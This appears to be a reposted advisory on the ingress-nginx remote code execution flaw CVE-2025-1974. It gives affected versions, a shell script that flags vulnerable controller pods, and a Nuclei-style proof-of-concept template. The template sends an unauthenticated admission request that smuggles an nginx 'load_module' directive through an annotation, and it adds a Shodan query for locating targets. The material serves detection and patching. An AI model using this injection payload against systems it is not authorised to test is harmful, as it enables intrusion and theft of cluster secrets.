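CVE-2025-1974 Kubernetes RCE Vulnerability
A security issue was discovered in Kubernetes. Under certain conditions, an unauthenticated attacker with access to the Pod network can execute arbitrary code in the context of the ingress-nginx controller. This can lead to disclosure of the Secrets the controller can access. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
This issue affects ingress-nginx. If ingress-nginx is not installed in your cluster, you are not affected. You can check by running `kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx`.
Affected versions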
< v1.11.0
v1.11.0 - 1.11.4
v1.12.0
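As an added example (not part of the original post), the shell script below combines the pod check with the version list above and labels each pod AFFECTED, OK or REVIEW. It assumes the controller image repository name ends in `/controller` and that the controller is the pod's first container; the function names and the sample pod lines are constructed for illustration.

```shell
# Added example: label ingress-nginx pods against the affected ranges listed
# above (< v1.11.0, v1.11.0 - 1.11.4, v1.12.0). Sample data is constructed.

# Print x.y.z for a controller image; fail for other images or unusable tags.
image_version() {
  ref=${1%%@*}                                  # drop optional @sha256 digest
  case ${ref%:*} in */controller) ;; *) return 1 ;; esac
  tag=${ref##*:}; tag=${tag#v}; tag=${tag%%[-+]*}
  case $tag in *[!0-9.]*|*.*.*.*|.*|*.|*..*) return 1 ;; esac
  case $tag in *.*.*) echo "$tag" ;; *) return 1 ;; esac
}

# Exit 0 when x.y.z falls inside the affected ranges.
is_affected() {
  old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
  [ "$1" -eq 1 ] || { [ "$1" -lt 1 ]; return; }
  [ "$2" -lt 11 ] && return 0
  [ "$2" -eq 11 ] && { [ "$3" -le 4 ]; return; }
  [ "$2" -eq 12 ] && [ "$3" -eq 0 ]
}

# Read "namespace pod image" lines on stdin and label each pod.
classify() {
  while read -r ns pod image; do
    if ! ver=$(image_version "$image"); then echo "REVIEW $ns/$pod $image"
    elif is_affected "$ver"; then echo "AFFECTED $ns/$pod $ver"
    else echo "OK $ns/$pod $ver"
    fi
  done
}

# Live input: same selector as the command above, one line per pod.
list_pods() {
  kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx \
    -o jsonpath='{range .items[*]}{.metadata.namespace} {.metadata.name} {.spec.containers[0].image}{"\n"}{end}'
}

# Constructed sample in the same shape, so this runs without a cluster.
sample_pods() {
  cat <<'EOF'
ingress-nginx ctl-a registry.k8s.io/ingress-nginx/controller:v1.11.4@sha256:0000
ingress-nginx ctl-b registry.k8s.io/ingress-nginx/controller:v1.12.1
legacy ctl-c registry.k8s.io/ingress-nginx/controller:v1.9.6
ingress-nginx certgen registry.k8s.io/ingress-nginx/kube-webhook-certgen:v1.4.4
EOF
}

sample_pods | classify    # on a cluster: list_pods | classify
```

REVIEW marks pods whose version cannot be read from the image reference, such as other images that carry the same label, digest-only references or renamed mirror images; check those by hand.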
POC
```yaml
id: CVE-2025-1974

info:
  name: Ingress-Nginx Controller - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A security issue was discovered in ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller
  impact: |
    Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.
  remediation: |
    Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later
  reference:
    - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
    - https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1974
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-653
    cve-id: CVE-2025-1974
  metadata:
    verified: true
    max-request: 1
    shodan-query: ssl:"ingress-nginx" port:8443
  tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "kind": "AdmissionReview",
          "apiVersion": "admission.k8s.io/v1",
          "request": {
            "uid": "d48aa397-c414-4fb2-a2b0-b28187daf8a6",
            "kind": {
              "group": "networking.k8s.io",
              "version": "v1",
              "kind": "Ingress"
            },
            "resource": {
              "group": "networking.k8s.io",
              "version": "v1",
              "resource": "ingresses"
            },
            "requestKind": {
              "group": "networking.k8s.io",
              "version": "v1",
              "kind": "Ingress"
            },
            "requestResource": {
              "group": "networking.k8s.io",
              "version": "v1",
              "resource": "ingresses"
            },
            "name": "test-{{randstr}}",
            "namespace": "default",
            "operation": "CREATE",
            "userInfo": {
            },
            "object": {
              "kind": "Ingress",
              "apiVersion": "networking.k8s.io/v1",
              "metadata": {
                "name": "test-{{randstr}}",
                "namespace": "default",
                "creationTimestamp": null,
                "annotations": {
                  "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"
                }
              },
              "spec": {
                "ingressClassName": "nginx",
                "rules": [
                  {
                    "host": "{{randstr}}",
                    "http": {
                      "paths": [
                      ]
                    }
                  }
                ]
              },
              "status": {
                "loadBalancer": {}
              }
            },
            "oldObject": null,
            "dryRun": true,
            "options": {
              "kind": "CreateOptions",
              "apiVersion": "meta.k8s.io/v1"
            }
          }
        }

    matchers:
      - type: word
        part: body
        words:
          - 'AdmissionReview'
          - 'directive is not allowed here'
          - 'load_module'
        condition: and
```
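Disclaimer
This article is intended solely for technical discussion and learning. Any direct or indirect consequences or losses arising from use of the information it provides are the sole responsibility of the user; this platform and the publisher accept no liability.
This is an original article licensed under CC BY-NC-ND 4.0. For full reposts, please credit 程序员小航.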